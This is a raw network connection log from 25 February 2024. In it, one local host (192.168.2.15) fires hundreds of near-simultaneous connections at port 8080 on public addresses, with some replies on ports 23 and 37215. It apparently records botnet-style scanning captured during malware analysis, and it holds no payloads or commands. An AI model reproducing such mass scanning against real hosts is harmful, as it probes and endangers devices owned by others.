Feb 25, 2024 19:02:17.878436089 CET	6758	8080	192.168.2.15	94.113.203.38
Feb 25, 2024 19:02:17.878436089 CET	6758	8080	192.168.2.15	85.222.155.83
Feb 25, 2024 19:02:17.878436089 CET	6758	8080	192.168.2.15	95.3.138.66
Feb 25, 2024 19:02:17.878436089 CET	6758	8080	192.168.2.15	94.178.201.74
Feb 25, 2024 19:02:17.878436089 CET	6758	8080	192.168.2.15	85.91.148.219
Feb 25, 2024 19:02:17.878436089 CET	6758	8080	192.168.2.15	94.255.180.139
Feb 25, 2024 19:02:17.878473043 CET	6758	8080	192.168.2.15	94.132.52.133
Feb 25, 2024 19:02:17.878473043 CET	6758	8080	192.168.2.15	62.78.13.120
Feb 25, 2024 19:02:17.878473043 CET	6758	8080	192.168.2.15	85.148.162.31
Feb 25, 2024 19:02:17.878473043 CET	6758	8080	192.168.2.15	31.225.28.36
Feb 25, 2024 19:02:17.878473043 CET	6758	8080	192.168.2.15	95.252.87.106
Feb 25, 2024 19:02:17.878473043 CET	6758	8080	192.168.2.15	31.137.56.170
Feb 25, 2024 19:02:17.878473043 CET	6758	8080	192.168.2.15	94.79.117.39
Feb 25, 2024 19:02:17.878473043 CET	6758	8080	192.168.2.15	95.121.113.236
Feb 25, 2024 19:02:17.878477097 CET	6758	8080	192.168.2.15	95.15.118.233
Feb 25, 2024 19:02:17.878477097 CET	6758	8080	192.168.2.15	31.116.185.194
Feb 25, 2024 19:02:17.878477097 CET	6758	8080	192.168.2.15	95.241.199.70
Feb 25, 2024 19:02:17.878477097 CET	6758	8080	192.168.2.15	94.158.224.128
Feb 25, 2024 19:02:17.878477097 CET	6758	8080	192.168.2.15	31.111.63.246
Feb 25, 2024 19:02:17.878477097 CET	6758	8080	192.168.2.15	95.133.110.67
Feb 25, 2024 19:02:17.878492117 CET	6758	8080	192.168.2.15	62.149.70.142
Feb 25, 2024 19:02:17.878492117 CET	6758	8080	192.168.2.15	95.129.129.60
Feb 25, 2024 19:02:17.878492117 CET	6758	8080	192.168.2.15	62.64.185.120
Feb 25, 2024 19:02:17.878492117 CET	6758	8080	192.168.2.15	31.189.108.117
Feb 25, 2024 19:02:17.878492117 CET	6758	8080	192.168.2.15	94.245.50.190
Feb 25, 2024 19:02:17.878528118 CET	6758	8080	192.168.2.15	62.147.11.108
Feb 25, 2024 19:02:17.878528118 CET	6758	8080	192.168.2.15	62.89.18.81
Feb 25, 2024 19:02:17.878528118 CET	6758	8080	192.168.2.15	94.124.131.104
Feb 25, 2024 19:02:17.878528118 CET	6758	8080	192.168.2.15	95.197.184.183
Feb 25, 2024 19:02:17.878528118 CET	6758	8080	192.168.2.15	31.178.210.64
Feb 25, 2024 19:02:17.878528118 CET	6758	8080	192.168.2.15	94.196.130.176
Feb 25, 2024 19:02:17.895184040 CET	44732	8080	192.168.2.15	94.123.6.73
Feb 25, 2024 19:02:18.030008078 CET	37215	6246	157.131.25.98	192.168.2.15
Feb 25, 2024 19:02:18.051996946 CET	37215	6246	157.90.217.120	192.168.2.15
Feb 25, 2024 19:02:18.078907013 CET	8080	6758	31.191.138.98	192.168.2.15
Feb 25, 2024 19:02:18.083543062 CET	23	58983	213.143.118.96	192.168.2.15
Feb 25, 2024 19:02:18.113349915 CET	8080	6758	94.121.100.30	192.168.2.15
Feb 25, 2024 19:02:18.113645077 CET	6758	8080	192.168.2.15	94.121.100.30
Feb 25, 2024 19:02:18.120452881 CET	8080	44732	94.123.6.73	192.168.2.15
Feb 25, 2024 19:02:18.120528936 CET	44732	8080	192.168.2.15	94.123.6.73
Feb 25, 2024 19:02:18.120693922 CET	44732	8080	192.168.2.15	94.123.6.73
Feb 25, 2024 19:02:18.120693922 CET	44732	8080	192.168.2.15	94.123.6.73
Feb 25, 2024 19:02:18.120698929 CET	32822	8080	192.168.2.15	94.121.100.30
Feb 25, 2024 19:02:18.120785952 CET	44750	8080	192.168.2.15	94.123.6.73
Feb 25, 2024 19:02:18.163297892 CET	23	58983	38.6.57.8	192.168.2.15
Feb 25, 2024 19:02:18.167874098 CET	23	58983	220.91.88.168	192.168.2.15
Feb 25, 2024 19:02:18.167979956 CET	23	58983	210.99.164.243	192.168.2.15
Feb 25, 2024 19:02:18.169025898 CET	23	58983	175.248.24.76	192.168.2.15
Feb 25, 2024 19:02:18.209971905 CET	23	58983	172.105.125.118	192.168.2.15
Feb 25, 2024 19:02:18.234639883 CET	8080	6758	85.35.79.157	192.168.2.15
Feb 25, 2024 19:02:18.264642000 CET	8080	6758	85.142.217.131	192.168.2.15
Feb 25, 2024 19:02:18.344880104 CET	8080	44750	94.123.6.73	192.168.2.15
Feb 25, 2024 19:02:18.345185041 CET	44750	8080	192.168.2.15	94.123.6.73
Feb 25, 2024 19:02:18.345185041 CET	44750	8080	192.168.2.15	94.123.6.73
Feb 25, 2024 19:02:18.345433950 CET	8080	44732	94.123.6.73	192.168.2.15
Feb 25, 2024 19:02:18.346126080 CET	8080	32822	94.121.100.30	192.168.2.15
Feb 25, 2024 19:02:18.346184015 CET	32822	8080	192.168.2.15	94.121.100.30
Feb 25, 2024 19:02:18.346221924 CET	32826	8080	192.168.2.15	94.121.100.30
Feb 25, 2024 19:02:18.346226931 CET	32822	8080	192.168.2.15	94.121.100.30
Feb 25, 2024 19:02:18.346226931 CET	32822	8080	192.168.2.15	94.121.100.30
Feb 25, 2024 19:02:18.566276073 CET	8080	32826	94.121.100.30	192.168.2.15
Feb 25, 2024 19:02:18.566485882 CET	32826	8080	192.168.2.15	94.121.100.30
Feb 25, 2024 19:02:18.566509962 CET	32826	8080	192.168.2.15	94.121.100.30
Feb 25, 2024 19:02:18.566536903 CET	6758	8080	192.168.2.15	94.221.246.23
Feb 25, 2024 19:02:18.566543102 CET	6758	8080	192.168.2.15	94.206.107.103
Feb 25, 2024 19:02:18.566543102 CET	6758	8080	192.168.2.15	95.131.200.139
Feb 25, 2024 19:02:18.566545010 CET	6758	8080	192.168.2.15	62.217.90.25
Feb 25, 2024 19:02:18.566587925 CET	6758	8080	192.168.2.15	94.179.86.87
Feb 25, 2024 19:02:18.566587925 CET	6758	8080	192.168.2.15	31.43.64.140
Feb 25, 2024 19:02:18.566590071 CET	6758	8080	192.168.2.15	85.227.243.64
Feb 25, 2024 19:02:18.566591024 CET	6758	8080	192.168.2.15	31.246.238.165
Feb 25, 2024 19:02:18.566591024 CET	6758	8080	192.168.2.15	85.151.24.19
Feb 25, 2024 19:02:18.566591024 CET	6758	8080	192.168.2.15	31.101.38.242
Feb 25, 2024 19:02:18.566591024 CET	6758	8080	192.168.2.15	85.95.11.137
Feb 25, 2024 19:02:18.566591978 CET	6758	8080	192.168.2.15	95.215.30.78
Feb 25, 2024 19:02:18.566591024 CET	6758	8080	192.168.2.15	94.174.71.121
Feb 25, 2024 19:02:18.566591024 CET	6758	8080	192.168.2.15	94.34.131.2
Feb 25, 2024 19:02:18.566591024 CET	6758	8080	192.168.2.15	94.149.44.106
Feb 25, 2024 19:02:18.566632986 CET	6758	8080	192.168.2.15	95.199.243.226
Feb 25, 2024 19:02:18.566633940 CET	6758	8080	192.168.2.15	94.27.188.80
Feb 25, 2024 19:02:18.566633940 CET	6758	8080	192.168.2.15	31.83.194.72
Feb 25, 2024 19:02:18.566652060 CET	6758	8080	192.168.2.15	94.68.222.189
Feb 25, 2024 19:02:18.566653013 CET	6758	8080	192.168.2.15	62.113.252.37
Feb 25, 2024 19:02:18.566652060 CET	6758	8080	192.168.2.15	94.238.223.129
Feb 25, 2024 19:02:18.566653013 CET	6758	8080	192.168.2.15	95.156.81.21
Feb 25, 2024 19:02:18.566652060 CET	6758	8080	192.168.2.15	85.203.133.199
Feb 25, 2024 19:02:18.566653013 CET	6758	8080	192.168.2.15	85.176.126.23
Feb 25, 2024 19:02:18.566652060 CET	6758	8080	192.168.2.15	85.170.158.113
Feb 25, 2024 19:02:18.566654921 CET	6758	8080	192.168.2.15	95.13.195.17
Feb 25, 2024 19:02:18.566654921 CET	6758	8080	192.168.2.15	62.64.103.133
Feb 25, 2024 19:02:18.566654921 CET	6758	8080	192.168.2.15	94.247.126.90
Feb 25, 2024 19:02:18.566656113 CET	6758	8080	192.168.2.15	31.61.197.144
Feb 25, 2024 19:02:18.566656113 CET	6758	8080	192.168.2.15	94.223.149.69
Feb 25, 2024 19:02:18.566657066 CET	6758	8080	192.168.2.15	62.119.55.255
Feb 25, 2024 19:02:18.566656113 CET	6758	8080	192.168.2.15	95.66.28.204
Feb 25, 2024 19:02:18.566657066 CET	6758	8080	192.168.2.15	95.141.26.89
Feb 25, 2024 19:02:18.566656113 CET	6758	8080	192.168.2.15	95.116.143.142
Feb 25, 2024 19:02:18.566656113 CET	6758	8080	192.168.2.15	62.241.79.181
Feb 25, 2024 19:02:18.566656113 CET	6758	8080	192.168.2.15	85.47.26.169
Feb 25, 2024 19:02:18.566656113 CET	6758	8080	192.168.2.15	62.168.104.117
Feb 25, 2024 19:02:18.566656113 CET	6758	8080	192.168.2.15	85.56.23.17
Feb 25, 2024 19:02:18.566656113 CET	6758	8080	192.168.2.15	94.121.142.20
Feb 25, 2024 19:02:18.566657066 CET	6758	8080	192.168.2.15	95.34.110.99
Feb 25, 2024 19:02:18.566656113 CET	6758	8080	192.168.2.15	62.87.14.93
Feb 25, 2024 19:02:18.566827059 CET	6758	8080	192.168.2.15	85.201.122.108
Feb 25, 2024 19:02:18.566827059 CET	6758	8080	192.168.2.15	95.249.113.221
Feb 25, 2024 19:02:18.566828012 CET	6758	8080	192.168.2.15	85.36.92.29
Feb 25, 2024 19:02:18.566828012 CET	6758	8080	192.168.2.15	94.156.179.98
Feb 25, 2024 19:02:18.566828012 CET	6758	8080	192.168.2.15	85.71.171.217
Feb 25, 2024 19:02:18.566831112 CET	6758	8080	192.168.2.15	62.107.129.138
Feb 25, 2024 19:02:18.566828012 CET	6758	8080	192.168.2.15	62.200.24.174
Feb 25, 2024 19:02:18.566831112 CET	6758	8080	192.168.2.15	95.131.192.116
Feb 25, 2024 19:02:18.566828012 CET	6758	8080	192.168.2.15	85.216.177.123
Feb 25, 2024 19:02:18.566832066 CET	6758	8080	192.168.2.15	85.89.166.197
Feb 25, 2024 19:02:18.566828966 CET	6758	8080	192.168.2.15	31.51.137.185
Feb 25, 2024 19:02:18.566832066 CET	6758	8080	192.168.2.15	31.21.80.65
Feb 25, 2024 19:02:18.566828012 CET	6758	8080	192.168.2.15	94.178.106.247
Feb 25, 2024 19:02:18.566828012 CET	6758	8080	192.168.2.15	85.214.212.45
Feb 25, 2024 19:02:18.566828012 CET	6758	8080	192.168.2.15	62.140.80.200
Feb 25, 2024 19:02:18.566828012 CET	6758	8080	192.168.2.15	94.234.160.93
Feb 25, 2024 19:02:18.566828012 CET	6758	8080	192.168.2.15	62.141.198.39
Feb 25, 2024 19:02:18.566828012 CET	6758	8080	192.168.2.15	62.173.179.26
Feb 25, 2024 19:02:18.566828012 CET	6758	8080	192.168.2.15	85.248.180.7
Feb 25, 2024 19:02:18.566828966 CET	6758	8080	192.168.2.15	31.163.34.185
Feb 25, 2024 19:02:18.566832066 CET	6758	8080	192.168.2.15	95.212.242.65
Feb 25, 2024 19:02:18.566832066 CET	6758	8080	192.168.2.15	62.62.181.231
Feb 25, 2024 19:02:18.566832066 CET	6758	8080	192.168.2.15	62.26.79.253
Feb 25, 2024 19:02:18.566832066 CET	6758	8080	192.168.2.15	62.194.109.26
Feb 25, 2024 19:02:18.566832066 CET	6758	8080	192.168.2.15	31.43.77.102
Feb 25, 2024 19:02:18.566828012 CET	6758	8080	192.168.2.15	95.95.47.165
Feb 25, 2024 19:02:18.566832066 CET	6758	8080	192.168.2.15	31.79.240.253
Feb 25, 2024 19:02:18.566832066 CET	6758	8080	192.168.2.15	85.117.16.61
Feb 25, 2024 19:02:18.566828012 CET	6758	8080	192.168.2.15	31.133.108.31
Feb 25, 2024 19:02:18.566832066 CET	6758	8080	192.168.2.15	85.147.2.152
Feb 25, 2024 19:02:18.566828012 CET	6758	8080	192.168.2.15	62.185.139.99
Feb 25, 2024 19:02:18.566828012 CET	6758	8080	192.168.2.15	95.58.172.91
Feb 25, 2024 19:02:18.566828012 CET	6758	8080	192.168.2.15	85.254.59.95
Feb 25, 2024 19:02:18.566828012 CET	6758	8080	192.168.2.15	85.102.74.173
Feb 25, 2024 19:02:18.566832066 CET	6758	8080	192.168.2.15	85.118.179.209
Feb 25, 2024 19:02:18.566832066 CET	6758	8080	192.168.2.15	62.113.244.118
Feb 25, 2024 19:02:18.566828012 CET	6758	8080	192.168.2.15	95.178.248.255
Feb 25, 2024 19:02:18.566832066 CET	6758	8080	192.168.2.15	31.49.208.7
Feb 25, 2024 19:02:18.566832066 CET	6758	8080	192.168.2.15	31.239.176.57
Feb 25, 2024 19:02:18.566828966 CET	6758	8080	192.168.2.15	62.247.57.78
Feb 25, 2024 19:02:18.566832066 CET	6758	8080	192.168.2.15	62.28.204.101
Feb 25, 2024 19:02:18.566832066 CET	6758	8080	192.168.2.15	95.125.191.186
Feb 25, 2024 19:02:18.566828966 CET	6758	8080	192.168.2.15	95.197.178.137
Feb 25, 2024 19:02:18.566832066 CET	6758	8080	192.168.2.15	62.85.251.246
Feb 25, 2024 19:02:18.566832066 CET	6758	8080	192.168.2.15	85.208.136.64
Feb 25, 2024 19:02:18.566831112 CET	6758	8080	192.168.2.15	31.150.154.110
Feb 25, 2024 19:02:18.566832066 CET	6758	8080	192.168.2.15	62.112.122.62
Feb 25, 2024 19:02:18.566828966 CET	6758	8080	192.168.2.15	94.85.246.161
Feb 25, 2024 19:02:18.566832066 CET	6758	8080	192.168.2.15	31.167.43.37
Feb 25, 2024 19:02:18.566831112 CET	6758	8080	192.168.2.15	94.162.43.6
Feb 25, 2024 19:02:18.566832066 CET	6758	8080	192.168.2.15	31.35.24.185
Feb 25, 2024 19:02:18.566831112 CET	6758	8080	192.168.2.15	85.46.105.188
Feb 25, 2024 19:02:18.566828966 CET	6758	8080	192.168.2.15	94.188.249.119
Feb 25, 2024 19:02:18.566832066 CET	6758	8080	192.168.2.15	31.203.8.66
Feb 25, 2024 19:02:18.566828966 CET	6758	8080	192.168.2.15	31.125.103.183
Feb 25, 2024 19:02:18.566832066 CET	6758	8080	192.168.2.15	62.85.114.25
Feb 25, 2024 19:02:18.566832066 CET	6758	8080	192.168.2.15	85.244.134.199
Feb 25, 2024 19:02:18.566911936 CET	6758	8080	192.168.2.15	94.255.99.53
Feb 25, 2024 19:02:18.566911936 CET	6758	8080	192.168.2.15	62.127.11.11
Feb 25, 2024 19:02:18.566911936 CET	6758	8080	192.168.2.15	62.212.73.212
Feb 25, 2024 19:02:18.566911936 CET	6758	8080	192.168.2.15	85.111.49.149
Feb 25, 2024 19:02:18.566911936 CET	6758	8080	192.168.2.15	31.62.120.53
Feb 25, 2024 19:02:18.566911936 CET	6758	8080	192.168.2.15	95.109.238.253
Feb 25, 2024 19:02:18.566911936 CET	6758	8080	192.168.2.15	95.186.229.192
Feb 25, 2024 19:02:18.566911936 CET	6758	8080	192.168.2.15	62.164.156.36
Feb 25, 2024 19:02:18.566972017 CET	6758	8080	192.168.2.15	95.126.172.218
Feb 25, 2024 19:02:18.566972017 CET	6758	8080	192.168.2.15	94.125.1.26
Feb 25, 2024 19:02:18.566972017 CET	6758	8080	192.168.2.15	95.3.75.139
Feb 25, 2024 19:02:18.566972017 CET	6758	8080	192.168.2.15	85.220.52.209
Feb 25, 2024 19:02:18.566972017 CET	6758	8080	192.168.2.15	62.11.203.71
Feb 25, 2024 19:02:18.566972017 CET	6758	8080	192.168.2.15	94.97.173.136
Feb 25, 2024 19:02:18.566972017 CET	6758	8080	192.168.2.15	95.97.213.166
Feb 25, 2024 19:02:18.566972017 CET	6758	8080	192.168.2.15	94.30.129.15
Feb 25, 2024 19:02:18.566999912 CET	6758	8080	192.168.2.15	31.58.137.59
Feb 25, 2024 19:02:18.566999912 CET	6758	8080	192.168.2.15	95.203.34.55
Feb 25, 2024 19:02:18.566999912 CET	6758	8080	192.168.2.15	85.209.35.13
Feb 25, 2024 19:02:18.566999912 CET	6758	8080	192.168.2.15	94.79.211.246
Feb 25, 2024 19:02:18.566999912 CET	6758	8080	192.168.2.15	62.171.107.228
Feb 25, 2024 19:02:18.567001104 CET	6758	8080	192.168.2.15	31.178.181.183
Feb 25, 2024 19:02:18.567001104 CET	6758	8080	192.168.2.15	85.69.8.4
Feb 25, 2024 19:02:18.567001104 CET	6758	8080	192.168.2.15	85.51.26.128
Feb 25, 2024 19:02:18.567003965 CET	6758	8080	192.168.2.15	94.98.74.96
Feb 25, 2024 19:02:18.567003965 CET	6758	8080	192.168.2.15	62.120.238.24
Feb 25, 2024 19:02:18.567003965 CET	6758	8080	192.168.2.15	94.13.19.20
Feb 25, 2024 19:02:18.567003965 CET	6758	8080	192.168.2.15	85.227.165.106
Feb 25, 2024 19:02:18.567003965 CET	6758	8080	192.168.2.15	31.251.46.246
Feb 25, 2024 19:02:18.567003965 CET	6758	8080	192.168.2.15	94.66.111.198
Feb 25, 2024 19:02:18.567003965 CET	6758	8080	192.168.2.15	62.50.64.243
Feb 25, 2024 19:02:18.567003965 CET	6758	8080	192.168.2.15	94.204.56.49
Feb 25, 2024 19:02:18.567006111 CET	6758	8080	192.168.2.15	85.54.171.179
Feb 25, 2024 19:02:18.567006111 CET	6758	8080	192.168.2.15	85.74.56.201
Feb 25, 2024 19:02:18.567006111 CET	6758	8080	192.168.2.15	94.119.228.156
Feb 25, 2024 19:02:18.567007065 CET	6758	8080	192.168.2.15	94.210.104.41
Feb 25, 2024 19:02:18.567006111 CET	6758	8080	192.168.2.15	95.3.107.73
Feb 25, 2024 19:02:18.567007065 CET	6758	8080	192.168.2.15	31.205.85.124
Feb 25, 2024 19:02:18.567006111 CET	6758	8080	192.168.2.15	31.43.183.34
Feb 25, 2024 19:02:18.567007065 CET	6758	8080	192.168.2.15	94.251.255.47
Feb 25, 2024 19:02:18.567009926 CET	6758	8080	192.168.2.15	31.214.127.153
Feb 25, 2024 19:02:18.567007065 CET	6758	8080	192.168.2.15	85.204.207.173
Feb 25, 2024 19:02:18.567009926 CET	6758	8080	192.168.2.15	95.113.24.220
Feb 25, 2024 19:02:18.567007065 CET	6758	8080	192.168.2.15	94.13.122.79
Feb 25, 2024 19:02:18.567009926 CET	6758	8080	192.168.2.15	85.222.8.147
Feb 25, 2024 19:02:18.567007065 CET	6758	8080	192.168.2.15	95.68.121.210
Feb 25, 2024 19:02:18.567006111 CET	6758	8080	192.168.2.15	95.82.91.231
Feb 25, 2024 19:02:18.567007065 CET	6758	8080	192.168.2.15	62.39.31.78
Feb 25, 2024 19:02:18.567006111 CET	6758	8080	192.168.2.15	31.0.165.139
Feb 25, 2024 19:02:18.567017078 CET	6758	8080	192.168.2.15	94.34.62.28
Feb 25, 2024 19:02:18.567009926 CET	6758	8080	192.168.2.15	95.13.246.84
Feb 25, 2024 19:02:18.567006111 CET	6758	8080	192.168.2.15	94.49.24.26
Feb 25, 2024 19:02:18.567017078 CET	6758	8080	192.168.2.15	94.252.216.100
Feb 25, 2024 19:02:18.567009926 CET	6758	8080	192.168.2.15	94.72.22.60
Feb 25, 2024 19:02:18.567009926 CET	6758	8080	192.168.2.15	31.210.60.223
Feb 25, 2024 19:02:18.567011118 CET	6758	8080	192.168.2.15	62.197.216.22
Feb 25, 2024 19:02:18.567011118 CET	6758	8080	192.168.2.15	85.91.164.125
Feb 25, 2024 19:02:18.567017078 CET	6758	8080	192.168.2.15	94.150.214.249
Feb 25, 2024 19:02:18.567017078 CET	6758	8080	192.168.2.15	31.35.46.206
Feb 25, 2024 19:02:18.567018032 CET	6758	8080	192.168.2.15	95.1.205.63
Feb 25, 2024 19:02:18.567018032 CET	6758	8080	192.168.2.15	31.22.121.137
Feb 25, 2024 19:02:18.567018032 CET	6758	8080	192.168.2.15	31.28.164.42
Feb 25, 2024 19:02:18.567018032 CET	6758	8080	192.168.2.15	94.104.150.91
Feb 25, 2024 19:02:18.567038059 CET	6758	8080	192.168.2.15	31.134.93.66
Feb 25, 2024 19:02:18.567039013 CET	6758	8080	192.168.2.15	85.206.135.232
Feb 25, 2024 19:02:18.567039013 CET	6758	8080	192.168.2.15	31.108.99.65
Feb 25, 2024 19:02:18.567039013 CET	6758	8080	192.168.2.15	95.104.220.5
Feb 25, 2024 19:02:18.567039013 CET	6758	8080	192.168.2.15	95.134.154.231
Feb 25, 2024 19:02:18.567039013 CET	6758	8080	192.168.2.15	94.255.209.57
Feb 25, 2024 19:02:18.567039013 CET	6758	8080	192.168.2.15	31.28.56.221
Feb 25, 2024 19:02:18.567039013 CET	6758	8080	192.168.2.15	95.152.158.9
Feb 25, 2024 19:02:18.567056894 CET	6758	8080	192.168.2.15	62.161.211.208
Feb 25, 2024 19:02:18.567058086 CET	6758	8080	192.168.2.15	95.158.137.106
Feb 25, 2024 19:02:18.567056894 CET	6758	8080	192.168.2.15	31.27.81.184
Feb 25, 2024 19:02:18.567058086 CET	6758	8080	192.168.2.15	95.188.62.91
Feb 25, 2024 19:02:18.567056894 CET	6758	8080	192.168.2.15	62.135.155.254
Feb 25, 2024 19:02:18.567058086 CET	6758	8080	192.168.2.15	31.24.21.26
Feb 25, 2024 19:02:18.567056894 CET	6758	8080	192.168.2.15	85.80.236.105
Feb 25, 2024 19:02:18.567058086 CET	6758	8080	192.168.2.15	31.223.129.250
Feb 25, 2024 19:02:18.567056894 CET	6758	8080	192.168.2.15	85.207.112.97
Feb 25, 2024 19:02:18.567058086 CET	6758	8080	192.168.2.15	31.167.156.151
Feb 25, 2024 19:02:18.567058086 CET	6758	8080	192.168.2.15	85.236.206.190
Feb 25, 2024 19:02:18.567058086 CET	6758	8080	192.168.2.15	94.86.18.49
Feb 25, 2024 19:02:18.567058086 CET	6758	8080	192.168.2.15	62.94.7.196
Feb 25, 2024 19:02:18.567056894 CET	6758	8080	192.168.2.15	95.186.180.189
Feb 25, 2024 19:02:18.567056894 CET	6758	8080	192.168.2.15	31.199.21.84
Feb 25, 2024 19:02:18.567070007 CET	6758	8080	192.168.2.15	95.125.78.90
Feb 25, 2024 19:02:18.567070007 CET	6758	8080	192.168.2.15	85.126.225.176
Feb 25, 2024 19:02:18.567070007 CET	6758	8080	192.168.2.15	95.180.212.112
Feb 25, 2024 19:02:18.567070007 CET	6758	8080	192.168.2.15	31.237.33.141
Feb 25, 2024 19:02:18.567070007 CET	6758	8080	192.168.2.15	62.159.193.173
Feb 25, 2024 19:02:18.567070007 CET	6758	8080	192.168.2.15	94.22.116.253
Feb 25, 2024 19:02:18.567070007 CET	6758	8080	192.168.2.15	85.13.12.80
Feb 25, 2024 19:02:18.567122936 CET	6758	8080	192.168.2.15	31.173.94.17
Feb 25, 2024 19:02:18.567122936 CET	6758	8080	192.168.2.15	85.174.239.118
Feb 25, 2024 19:02:18.567122936 CET	6758	8080	192.168.2.15	31.71.191.32
Feb 25, 2024 19:02:18.567122936 CET	6758	8080	192.168.2.15	62.166.9.243
Feb 25, 2024 19:02:18.567122936 CET	6758	8080	192.168.2.15	95.202.148.255
Feb 25, 2024 19:02:18.567126036 CET	6758	8080	192.168.2.15	95.115.142.143
Feb 25, 2024 19:02:18.567122936 CET	6758	8080	192.168.2.15	62.158.112.88
Feb 25, 2024 19:02:18.567126036 CET	6758	8080	192.168.2.15	62.14.137.26
Feb 25, 2024 19:02:18.567122936 CET	6758	8080	192.168.2.15	85.242.113.69
Feb 25, 2024 19:02:18.567126036 CET	6758	8080	192.168.2.15	94.64.136.168
Feb 25, 2024 19:02:18.567123890 CET	6758	8080	192.168.2.15	31.253.85.221
Feb 25, 2024 19:02:18.567126036 CET	6758	8080	192.168.2.15	31.182.168.12
Feb 25, 2024 19:02:18.567126036 CET	6758	8080	192.168.2.15	31.52.171.251
Feb 25, 2024 19:02:18.567126036 CET	6758	8080	192.168.2.15	31.47.228.129
Feb 25, 2024 19:02:18.567126036 CET	6758	8080	192.168.2.15	85.118.118.247
Feb 25, 2024 19:02:18.567137957 CET	6758	8080	192.168.2.15	85.28.240.160
Feb 25, 2024 19:02:18.567137957 CET	6758	8080	192.168.2.15	31.59.199.158
Feb 25, 2024 19:02:18.567137957 CET	6758	8080	192.168.2.15	94.201.79.207
Feb 25, 2024 19:02:18.567137957 CET	6758	8080	192.168.2.15	85.77.211.18
Feb 25, 2024 19:02:18.567137957 CET	6758	8080	192.168.2.15	31.172.13.9
Feb 25, 2024 19:02:18.567137957 CET	6758	8080	192.168.2.15	94.105.61.97
Feb 25, 2024 19:02:18.567137957 CET	6758	8080	192.168.2.15	31.33.20.147
Feb 25, 2024 19:02:18.567137957 CET	6758	8080	192.168.2.15	94.47.245.216
Feb 25, 2024 19:02:18.567151070 CET	6758	8080	192.168.2.15	62.53.52.167
Feb 25, 2024 19:02:18.567151070 CET	6758	8080	192.168.2.15	62.221.220.123
Feb 25, 2024 19:02:18.567151070 CET	6758	8080	192.168.2.15	62.28.27.98
Feb 25, 2024 19:02:18.567151070 CET	6758	8080	192.168.2.15	62.17.250.68
Feb 25, 2024 19:02:18.567151070 CET	6758	8080	192.168.2.15	62.89.143.169
Feb 25, 2024 19:02:18.567151070 CET	6758	8080	192.168.2.15	85.109.157.8
Feb 25, 2024 19:02:18.567163944 CET	6758	8080	192.168.2.15	31.161.42.213
Feb 25, 2024 19:02:18.567163944 CET	6758	8080	192.168.2.15	95.172.97.71
Feb 25, 2024 19:02:18.567163944 CET	6758	8080	192.168.2.15	85.89.186.49
Feb 25, 2024 19:02:18.567164898 CET	6758	8080	192.168.2.15	62.168.209.8
Feb 25, 2024 19:02:18.567164898 CET	6758	8080	192.168.2.15	95.25.53.46
Feb 25, 2024 19:02:18.567164898 CET	6758	8080	192.168.2.15	62.159.58.136
Feb 25, 2024 19:02:18.567164898 CET	6758	8080	192.168.2.15	62.207.39.16
Feb 25, 2024 19:02:18.567171097 CET	6758	8080	192.168.2.15	85.77.181.104
Feb 25, 2024 19:02:18.567171097 CET	6758	8080	192.168.2.15	62.37.207.7
Feb 25, 2024 19:02:18.567171097 CET	6758	8080	192.168.2.15	62.13.216.43
Feb 25, 2024 19:02:18.567171097 CET	6758	8080	192.168.2.15	95.29.165.205
Feb 25, 2024 19:02:18.567173004 CET	6758	8080	192.168.2.15	94.167.24.49
Feb 25, 2024 19:02:18.567171097 CET	6758	8080	192.168.2.15	62.131.179.236
Feb 25, 2024 19:02:18.567173004 CET	6758	8080	192.168.2.15	94.166.59.164
Feb 25, 2024 19:02:18.567171097 CET	6758	8080	192.168.2.15	62.223.228.230
Feb 25, 2024 19:02:18.567173004 CET	6758	8080	192.168.2.15	85.226.116.54
Feb 25, 2024 19:02:18.567172050 CET	6758	8080	192.168.2.15	94.197.146.77
Feb 25, 2024 19:02:18.567173004 CET	6758	8080	192.168.2.15	94.127.51.237
Feb 25, 2024 19:02:18.567172050 CET	6758	8080	192.168.2.15	31.95.123.16
Feb 25, 2024 19:02:18.567173004 CET	6758	8080	192.168.2.15	85.41.49.6
Feb 25, 2024 19:02:18.567173004 CET	6758	8080	192.168.2.15	85.164.205.164
Feb 25, 2024 19:02:18.567173004 CET	6758	8080	192.168.2.15	31.105.16.31
Feb 25, 2024 19:02:18.567202091 CET	6758	8080	192.168.2.15	95.193.4.204
Feb 25, 2024 19:02:18.567202091 CET	6758	8080	192.168.2.15	94.244.181.49
Feb 25, 2024 19:02:18.567202091 CET	6758	8080	192.168.2.15	94.155.136.31
Feb 25, 2024 19:02:18.567202091 CET	6758	8080	192.168.2.15	62.176.253.3
Feb 25, 2024 19:02:18.567202091 CET	6758	8080	192.168.2.15	62.13.200.30
Feb 25, 2024 19:02:18.567202091 CET	6758	8080	192.168.2.15	94.181.170.103
Feb 25, 2024 19:02:18.567202091 CET	6758	8080	192.168.2.15	94.126.163.24
Feb 25, 2024 19:02:18.567202091 CET	6758	8080	192.168.2.15	95.128.139.149
Feb 25, 2024 19:02:18.567208052 CET	6758	8080	192.168.2.15	62.48.90.123
Feb 25, 2024 19:02:18.567208052 CET	6758	8080	192.168.2.15	62.17.129.149
Feb 25, 2024 19:02:18.567208052 CET	6758	8080	192.168.2.15	94.49.253.184
Feb 25, 2024 19:02:18.567208052 CET	6758	8080	192.168.2.15	95.143.247.84
Feb 25, 2024 19:02:18.567209005 CET	6758	8080	192.168.2.15	31.31.116.191
Feb 25, 2024 19:02:18.567209005 CET	6758	8080	192.168.2.15	31.71.112.250
Feb 25, 2024 19:02:18.567209005 CET	6758	8080	192.168.2.15	62.101.215.215
Feb 25, 2024 19:02:18.567223072 CET	6758	8080	192.168.2.15	31.33.163.134
Feb 25, 2024 19:02:18.567223072 CET	6758	8080	192.168.2.15	85.47.33.99
Feb 25, 2024 19:02:18.567223072 CET	6758	8080	192.168.2.15	95.11.143.18
Feb 25, 2024 19:02:18.567223072 CET	6758	8080	192.168.2.15	95.240.220.33
Feb 25, 2024 19:02:18.567223072 CET	6758	8080	192.168.2.15	95.232.147.182
Feb 25, 2024 19:02:18.567223072 CET	6758	8080	192.168.2.15	95.150.36.182
Feb 25, 2024 19:02:18.567223072 CET	6758	8080	192.168.2.15	31.62.51.209
Feb 25, 2024 19:02:18.567223072 CET	6758	8080	192.168.2.15	95.70.237.236
Feb 25, 2024 19:02:18.567239046 CET	6758	8080	192.168.2.15	62.211.54.2
Feb 25, 2024 19:02:18.567239046 CET	6758	8080	192.168.2.15	31.39.48.84
Feb 25, 2024 19:02:18.567239046 CET	6758	8080	192.168.2.15	85.194.221.126
Feb 25, 2024 19:02:18.567239046 CET	6758	8080	192.168.2.15	85.102.64.185
Feb 25, 2024 19:02:18.567239046 CET	6758	8080	192.168.2.15	31.56.185.176
